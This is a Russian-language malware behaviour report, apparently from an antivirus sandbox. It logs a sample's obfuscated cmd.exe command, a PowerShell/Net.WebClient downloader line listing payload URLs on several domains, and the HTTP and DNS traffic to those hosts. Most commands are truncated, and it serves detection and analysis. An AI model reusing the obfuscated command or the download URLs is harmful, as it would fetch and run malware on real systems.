Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"s^e^t ^TP^d=9^s1;^BKk^'^:^<^?M^*8Rvl^&Lr0Ug'.y^>=%^O$NuOc^Dl^}\^G^sV^2$cao}\Sl^}^[-^+{V^7=h^o^U]c^>[Nt%N1a^;9^Xcr^h]^}^&u^6^}^&5f^;,^xVk^2N^x^a^$^<...
Сетевая активность
Подключается к
- 'er####venthal.com':80
- 'sa#####.leadseven.com':80
- 'ko##es.nl':80
- 'ko##es.nl':443
- '2f###4paws.ae':80
- '2f###4paws.ae':443
TCP
Запросы HTTP GET
- http://er####venthal.com/LbHALp0
- http://sa#####.leadseven.com/4aecrd1m
- http://www.ko##es.nl/s7U7gvF
- http://2f###4paws.ae/zlDRRqIln
Другие
- 'ko##es.nl':443
- '2f###4paws.ae':443
UDP
- DNS ASK er####venthal.com
- DNS ASK sa#####.leadseven.com
- DNS ASK ko##es.nl
- DNS ASK 2f###4paws.ae
- DNS ASK ca####ventosa.pt
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"s^e^t ^TP^d=9^s1;^BKk^'^:^<^?M^*8Rvl^&Lr0Ug'.y^>=%^O$NuOc^Dl^}\^G^sV^2$cao}\Sl^}^[-^+{V^7=h^o^U]c^>[Nt%N1a^;9^Xcr^h]^}^&u^6^}^&5f^;,^xVk^2N^x^a^$^<...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"s^e^t ^TP^d=9^s1;^BKk^'^:^<^?M^*8Rvl^&Lr0Ug'.y^>=%^O$NuOc^Dl^}/^G^sV^2$cao}/Sl^}^[-^+{V^7=h^o^U]c^>[Nt%N1a^;9^Xcr^h]^}^&u^6^}^&5f^;,^xVk^2N^x^a^$^<H^e^'^p^]r^2%Y^bc^.%;^[^p@'=-^swfl^9^a^w...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $ZCi='ziS';$GUr=new-object Net.WebClient;$iru='http://er####venthal.com/LbHALp0@http://sandbox.leadseven.com/4aecrd1m@http://www.kosses.nl/s7U7gvF@http://2feet4paws.ae/zlDRRqIln@...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
